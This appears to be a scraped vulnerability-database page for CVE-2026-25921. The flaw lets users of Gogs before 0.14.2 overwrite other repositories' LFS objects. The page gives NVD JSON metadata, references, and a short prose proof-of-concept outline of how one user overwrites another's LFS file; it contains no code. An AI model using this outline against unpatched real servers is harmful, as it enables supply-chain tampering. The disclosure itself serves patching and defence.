References

URL	Tags
security-advisories@github.com	https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c	Patch
security-advisories@github.com	https://github.com/gogs/gogs/pull/8166	Issue Tracking
security-advisories@github.com	https://github.com/gogs/gogs/releases/tag/v0.14.2	Release Notes
security-advisories@github.com	https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c	Exploit, Vendor Advisory, Mitigation

Impacted products

	Vendor	Product	Version
	gogs	gogs	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0EDBB1E3-57E4-4560-A44F-7C54FD21C8B9",
              "versionEndExcluding": "0.14.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Gogs is an open source self-hosted Git service. Prior to version 0.14.2, overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers. This issue has been patched in version 0.14.2."
    },
    {
      "lang": "es",
      "value": "Gogs es un servicio Git autoalojado de c\u00f3digo abierto. Antes de la versi\u00f3n 0.14.2, un objeto LFS sobrescribible entre diferentes repositorios conduce a un ataque a la cadena de suministro, todos los objetos LFS son vulnerables a ser sobrescritos maliciosamente por atacantes maliciosos. Este problema ha sido parcheado en la versi\u00f3n 0.14.2."
    }
  ],
  "id": "CVE-2026-25921",
  "lastModified": "2026-03-06T14:02:02.117",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 9.3,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-05T19:16:03.183",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/gogs/gogs/pull/8166"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory",
        "Mitigation"
      ],
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-345"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25921 (GCVE-0-2026-25921)

WID-SEC-W-2026-0623

GHSA-CJ4V-437J-JQ4C

Summary

Details

PoC

1. User (admin1) upload a LFS object into their repository admin1/testlfs.git normally

2. Attacker user2 overwrite this file by uploading manipulated content to their repo user2/public.git

3. Verify the content has been overwritten:

Impact

Fix Suggestion

FKIE_CVE-2026-25921

Tags

Sightings

Nomenclature

1. User (admin1) upload a LFS object into their repository `admin1/testlfs.git` normally

2. Attacker `user2` overwrite this file by uploading manipulated content to their repo `user2/public.git`